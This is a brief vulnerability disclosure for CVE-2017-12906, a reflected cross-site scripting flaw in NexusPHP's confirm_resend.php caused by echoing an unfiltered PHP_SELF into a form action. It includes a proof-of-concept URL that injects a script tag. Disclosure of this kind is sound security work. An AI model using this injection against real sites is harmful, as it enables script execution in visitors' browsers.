CVE-2017-12906

nexusphp confirm_resend.php xss

powered by minhaizhao from Anyuntec

version: v1.5.beta5.20120707

Download link:https://sourceforge.net/projects/nexusphp/

Vulnerability details

/nexusphp.v1.5.beta5.20120707/confirm_resend.php Line 102

<form method="get" action="<?php echo $_SERVER['PHP_SELF'] ?>">

$_SERVER['PHP_SELF'] has not been filtered to cause injection

EXP:

http://localhost/confirm_resend.php/"><script>alert(/xss/)</script>"<
Alt text

Alt text